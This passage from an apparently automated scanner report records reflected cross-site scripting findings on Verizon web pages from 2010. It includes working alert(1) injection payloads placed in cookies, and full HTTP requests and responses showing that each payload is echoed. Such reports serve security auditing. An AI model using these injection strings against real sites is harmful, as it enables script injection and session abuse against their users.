UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115390
Expires: Sat, 20 Nov 2010 02:55:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "b10ba"-alert(1)-"93515101fac"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.278. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dcef1'><script>alert(1)</script>614ae10fb65 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdcef1'><script>alert(1)</script>614ae10fb65; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102485
Expires: Sat, 20 Nov 2010 02:56:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=TXdcef1'><script>alert(1)</script>614ae10fb65; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXDCEF1'><SCRIPT>ALERT(1)</SCRIPT>614AE10FB65 ' />
...[SNIP]...

3.279. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload c9efe<script>alert(1)</script>6775dca418 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc9efe<script>alert(1)</script>6775dca418; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102479
Expires: Sat, 20 Nov 2010 02:56:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=TXc9efe<script>alert(1)</script>6775dca418; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:41 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC9EFE<SCRIPT>ALERT(1)</SCRIPT>6775DCA418 </DIV>
...[SNIP]...

3.280. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb6fd"-alert(1)-"6d30b2026af was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=bb6fd"-alert(1)-"6d30b2026af; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 108514
Expires: Sat, 20 Nov 2010 02:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "bb6fd"-alert(1)-"6d30b2026af"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

3.281. https://www22.verizon.com/Residential/FiOSTV/Check_Availability/Check_Availability.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Check_Availability/Check_Availability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6663'><script>alert(1)</script>7127b0cbbb7 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Check_Availability/Check_Availability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXd6663'><script>alert(1)</script>7127b0cbbb7; ProductXML=A; IHAClientIP=112.64.2.103; 